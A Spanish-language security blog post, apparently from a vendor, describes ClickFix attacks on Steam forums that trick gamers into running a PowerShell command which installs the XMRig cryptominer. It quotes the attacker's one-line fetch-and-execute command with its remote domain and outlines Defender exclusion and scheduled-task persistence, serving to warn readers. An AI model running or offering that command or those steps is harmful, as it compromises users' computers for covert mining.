Este año fue testigo de un verdadero auge de los ataques de ClickFix. Tiene tanto éxito entre los delincuentes que apenas terminamos de escribir sobre una variación cuando ya es hora de cubrir la siguiente.
Esta vez, los atacantes tienen como objetivo a los jugadores: los periodistas tecnológicos detectaron publicaciones que ofrecían consejos maliciosos en los foros de Steam. Aquí detallamos cómo se ven estas publicaciones, qué malware suelen propagar y cómo mantener tu dispositivo a salvo.
ClickFix llega a los foros de Steam
Muchos jugadores recurren a sus compañeros de juego en los foros de Steam para obtener ayuda y consejos sobre cuestiones como completar una misión difícil, subir de nivel, obtener el mejor botín o solucionar un error. Es precisamente esta confianza en los consejos de la comunidad lo que los atacantes decidieron aprovechar.
El ataque comienza cuando los delincuentes responden a la pregunta de alguien sobre errores de juego, elementos del inventario que faltan u otros problemas técnicos. Haciéndose pasar por comentaristas útiles, sugieren abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema que está teniendo el usuario.

Disfrazando su publicación como consejos para solucionar problemas, el actor malicioso sugiere ejecutar PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema del usuario. Fuente
Como puedes suponer, ejecutar el comando no soluciona nada, solo abre una nueva caja de Pandora. Esa es la idea detrás de ClickFix: usar la ingeniería social con el objetivo de engañar a las víctimas para que realicen acciones inseguras por sí mismas mientras les da a los estafadores lo que necesitan para poner en riesgo el dispositivo. Cubrimos otros trucos de ClickFix antes (CAPTCHA falsos, errores de navegador falsos y más) que se basan en hacer que la víctima ejecute el comando malicioso por su cuenta. Puedes leer más sobre las diferentes variaciones de los ataques de ClickFix en nuestra publicación anterior.
La astucia de usar ClickFix en los foros de Steam es que el ataque puede afectar no solo al jugador que solicitó ayuda; muchos otros jugadores que tienen el mismo problema y encuentran la respuesta a través de una búsqueda en Google también pueden caer en la trampa.
Una introducción rápida: lo que realmente hay detrás del comando irm | iex
Antes de adentrarnos en qué consiguen los atacantes que los jugadores instalen de esta manera, debemos cubrir algunos antecedentes técnicos. En primer lugar, las publicaciones en los foros de Steam aconsejan a las posibles víctimas desprevenidas que ejecuten el siguiente comando en PowerShell:
irm msfconfig.icu | iex
Para alguien que no esté íntimamente familiarizado con PowerShell, esta línea puede parecer bastante inocua: se parece a iniciar MSConfig, la utilidad de configuración del sistema integrada de Windows, con algunos parámetros adicionales.
Sin embargo, es todo menos inofensivo. Analicemos qué hace realmente cada parte de este comando:
- irm es la abreviatura del comando integrado de PowerShell Invoke-RestMethod. Se comunica con la dirección web especificada más adelante en la línea y recupera datos en respuesta.
- icu es esa dirección web, no el nombre de un archivo local como podría parecer a primera vista. Este es el servidor de los atacantes, que responde a la solicitud de irm con un script de PowerShell malicioso.
- iex es otro comando integrado de PowerShell, Invoke-Expression. Toma lo que irm recibe de esa dirección web y lo ejecuta como código de PowerShell.
Una vez que se ejecuta, esta línea de código de PowerShell descarga un script del sitio especificado y lo ejecuta inmediatamente. Como señaló acertadamente un usuario de Reddit, puedes averiguar con seguridad qué código se descargará realmente en tu dispositivo, sin el riesgo de que se ejecute, simplemente si eliminas la segunda parte, iex. Sin esa parte, el comando solo descargará el contenido del script y lo imprimirá en la ventana de PowerShell sin ejecutarlo. Esto forma el código completo y no oculto que se te pide que ejecutes en tu dispositivo. A continuación, veamos lo que estos útiles foristas de Steam realmente intentan que los jugadores instalen en sus máquinas.
Un criptominero, no una herramienta de optimización
Los atacantes hicieron su tarea: el script de PowerShell descargado de su servidor hace un trabajo convincente al imitar una utilidad de optimización de Windows. Una vez iniciado, le muestra al usuario una serie de notificaciones que afirman borrar archivos temporales, vaciar la caché de DNS, actualizar controladores, verificar si hay errores en el disco, deshabilitar aplicaciones de inicio innecesarias, analizar el sistema en busca de malware, reparar la imagen de Windows y verificar la integridad del archivo del sistema.

El script muestra una secuencia de mensajes acerca de varias tareas de optimización falsas para que parezca que está realizando un mantenimiento útil. Fuente
Mientras tanto, la verdadera actividad ocurre detrás de escena. El script empieza comprobando si se está ejecutando con privilegios de administrador. Si es así, crea una carpeta de trabajo oculta en C:\Windows\Background y la agrega a la lista de exclusión de Microsoft Defender. A partir de ese momento, el antivirus integrado de Windows deja de analizar los archivos colocados en esa carpeta.
A continuación, el script prepara el sistema para la siguiente etapa del ataque, descarga un archivo ejecutable del servidor de los atacantes y lo guarda en esa misma carpeta C:\Windows\Background con un nombre que suena legítimo: system.exe.
El archivo descargado es XMRig, una de las herramientas más populares para extraer la criptomoneda Monero. XMRig en sí no es malware; es una herramienta de minería de código abierto legítima. El problema es que los atacantes lo instalan en los equipos de las víctimas sin su conocimiento. Una vez que se está ejecutando, la potencia de cómputo del dispositivo es secuestrada para la minería de Monero, y la criptomoneda resultante va directamente a los delincuentes.
Esto hace que las plataformas de los jugadores sean objetivos especialmente atractivos: las PC modernas para juegos contienen CPU y GPU potentes, exactamente el tipo de hardware que es ideal para la criptominería.
Para asegurarse de que el malware sobreviva al reinicio, el script también crea una nueva tarea en el Programador de tareas de Windows: XMRig-{nombre del equipo}. A partir de ese momento, inicia automáticamente el criptominero cada vez que se inicia el sistema.
Cómo proteger tu dispositivo de los criptomineros y otros tipos de malware
Desafortunadamente, muchos jugadores son reacios a instalar software de seguridad o mantenerlo funcionando en sus dispositivos. El principal culpable es el persistente mito de que “un antivirus ralentiza el juego”. Cubrimos investigaciones sobre esto en nuestro blog anteriormente y los resultados no mostraron un impacto considerable en el rendimiento por ejecutar un antivirus mientras se juega.
Sin embargo, no se puede decir lo mismo de los criptomineros: definitivamente perjudican el rendimiento y desgastan tu hardware más rápido. Entonces, ¿qué puedes hacer para mantener tus cuentas y tu PC para juegos fuera de peligro?
- Evita ejecutar PowerShell, Terminal u otros scripts de la línea de comandos que las personas extrañas te sugieran que copies y ejecutes, ya sea en foros, chats o comentarios.
- Antes de presionar la tecla Enter en cualquier comando que no entiendas completamente, busca lo que hace y las posibles consecuencias de ejecutarlo.
- Usa una solución de seguridad confiable con un modo de juego que marque los intentos de descarga de malware a tiempo y bloquee su ejecución.
- No apagues la protección mientras juegas. Usar una solución con un modo de juego exclusivo es el camino a seguir. Los productos de seguridad de Kaspersky activan automáticamente ese modo tan pronto como se inicie un juego, posponiendo las actualizaciones de bases de datos antivirus, las notificaciones y los análisis de disco programados hasta que termines de jugar.
¿Tienes curiosidad por saber de qué otra forma los atacantes apuntan contra los jugadores? Lee nuestras otras publicaciones:
Ladrón de Stealka: la nueva cara de trucos, modificaciones y cracks de juegos
Vulnerabilidad en el motor de juegos de Unity
Jugadores bajo fuego: el malware en sitios web oficiales
jugadores
Consejos